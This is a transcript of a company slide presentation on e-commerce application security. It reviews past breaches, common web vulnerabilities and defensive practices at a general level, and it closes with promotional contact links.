E-commerce application security
-
Upload
to-the-new-technology -
Category
Technology
-
view
140 -
download
0
Transcript of E-commerce application security
E-commerce Application SecurityWays to secure your application from hackers
Building a software is easy, building a secure software is difficult….Vulnerabilities are inevitable, hacking is not…
What is it all about ??
• Importance of security in e-commerce
• Major attacks on e-commerce applications
• Common issues and vulnerabilities in applications
• What makes attackers target your application?
• Vulnerabilities that might be present in your application
• How do hackers attack your application?
• Do's and Dont's to improve application security
You can also view a recorded session of this presentation here!
How security affects e-commerce?
• Tarnishes company’s reputation in public
• Huge financial loss due to post breach activities like email notification, patching, business loss etc. Image
• One breach invites many other hackers
• Loss of costumers trust
• Loss of business
You can also view a recorded session of this presentation here!
Ecommerce Hacks
What does eBay, Zappos (Amazon), Dominos and Starbucks have in common?
They all suffered huge data breaches in the last few years. For more info checkout: Link
eBay Data Breach
• Attackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay’s corporate network
• The attack obtained user information such as dates of birth, names, email addresses, phone numbers, residential addresses and passwords (encrypted)
Lessons to learn from this hack:
• Centralize Application Management• Secure Employee Personal
Accounts• Ensure strong password policy• Proactive stand for security
You can also view a recorded session of this presentation here!
Starbucks Data Breach• Starbucks mobile app was hacked twice in a period of few months
• Hackers stole money from several Starbucks customers by gaining access to their credit card information
• Criminals used Starbucks accounts to access consumers’ linked credit cards. They could steal hundreds of dollars in a matter of minutes.
Lessons to learn from this hack:
• Securing the mobile application and backend API
• Proactive measure against the cyber attacks, like Penetration testing and vulnerability assessments
You can also view a recorded session of this presentation here!
Commonly Exploited Vulnerabilities
• Injection Attacks like Sql Injection, leads to critical data loss
• Improper implementation of payment system and logical vulnerabilities• X0RC0NF presentation: Link
• Insecure mobile application and backend API server
• Insecure direct object reference: Unrestricted access to subdomains
• Privilege Escalation and authorization bypass
• Cross Site Scripting: Hijacking accounts
• Improper Policy implementations, like weak passwords, insecure storage
You can also view a recorded session of this presentation here!
Injection Attacks
Injection attacks can result in data loss or corruption, lack of accountability, denial of access or complete host takeover.
For e.g., Sql injection may lead to total compromise of your database.
You can also view a recorded session of this presentation here!
Payment system and logical vulnerabilities
Payment gateways are often
found to be insecurely implemented that may lead to attacks like Payment forgery or restrictions bypass.
Logical vulnerabilities are hard
to discover but have huge impact on business.
You can also view a recorded session of this presentation here!
Insecure mobile application and backend API server
Protecting only the web
applications from hackers is not sufficient.
With the increased use of smart phones and tablets, the internet is flooded with mobile applications. These applications must also be secured from attacks along with proper implementations of API calls.
You can also view a recorded session of this presentation here!
Insecure direct object reference
Insecure direct object
reference means referencing an object such as a page or a file directly that was not meant to be directly referenced.
Such insecure entry points are often discovered in applications while performing a pentest.
You can also view a recorded session of this presentation here!
Privilege Escalation and authorization bypass
Privilege Escalation enables
the attacker to compromise an user’s account by accessing those resources that are meant to be private.
If the compromised account is that of an administrator, the attacker now controls the admin functionalities.
You can also view a recorded session of this presentation here!
Cross Site Scripting
Attackers can execute scripts
in a victim’s browser to hijack user sessions and steal cookies.
This is one of the most common attack vectors that attackers use to steal credentials/tokens and perform targeted attacks
You can also view a recorded session of this presentation here!
Improper Policy implementations- A Weak Password
A weak password policy that
allows the users to set a weak password makes the application vulnerable to attacks such as brute force and Password guessing.
You can also view a recorded session of this presentation here!
Hacker’s Jackpot
• Credit card data, personal info like, phone number, address can be sold in black market
• Personal Info can be used for blackmailing and phishing
• Un-encrypted database can be sold very easily to competitors
“If you're a @dominos_pizzafr customer, u may want to know that we have offered Domino's not to publish your data in exchange for €30,000,”
-Tweet by hackers after Dominos Hack
Financial services are amongst top 3 of most attacked services on internet
-2015-DBIR (Verizon)
You can also view a recorded session of this presentation here!
What Hacker’s look for?
• Unpatched servers, or network devices• Insecure vulnerable implementation of known software's like
WordPress• Older/outdated software being used, with known publicly available
exploits• Common vulnerabilities like CSRF, XSS, lack of HTTPS, brute-forcing
etc.• Subdomains without proper authorization or public sensitive data
“In our experience, 30-45% or applications have one or more than one critical vulnerability.”47% of all breaches in 2015 study were caused by malicious or criminal attacks.
-DBIR (Verizon)
You can also view a recorded session of this presentation here!
How hackers attack?
• Choosing the weakest link to attack, web application, unpatched servers, employee credentials etc.
• Finding the vulnerability in web application to steal credentials or users and exploit
• One XSS in any page may lead to admin account compromise
• Search for any vulnerable implementation of known software like WordPress or Magento
• Hacking a weak WordPress blog is way easier than hacking the website itself
• Data exfiltration is done in an stealth mode
You can also view a recorded session of this presentation here!
Safeguarding
• Proactively discover and remediate the application vulnerabilities in a timely manner
• A good penetration test will discover logical vulnerabilities and authorization issues too
• Make sure to assess all the subdomains, servers and all accessible portals. It’s not hidden if you have not provided a direct link – Doing a small Google search will reveal many sub-domains “site:xyz.com -www”
• Ensure strong encryption and policy to be implemented on application and network
• Easy to find vulnerabilities affect the most, if not fixed. XSS, CSRF, file uploads etc.
• Always audit the application server together with the web application
• Mobile applications are becoming the easy target for hackers, make sure to assess it for vulnerabilities
It might be dark, but the light is not very far
You can also view a recorded session of this presentation here!
Contact us
Our Office
Client Location
Here’s how TOTHENEW helps in building an E-commerce for its customers!
Click Here To Know More!
Have more queries related to E-commerce?
Talk To Our Experts!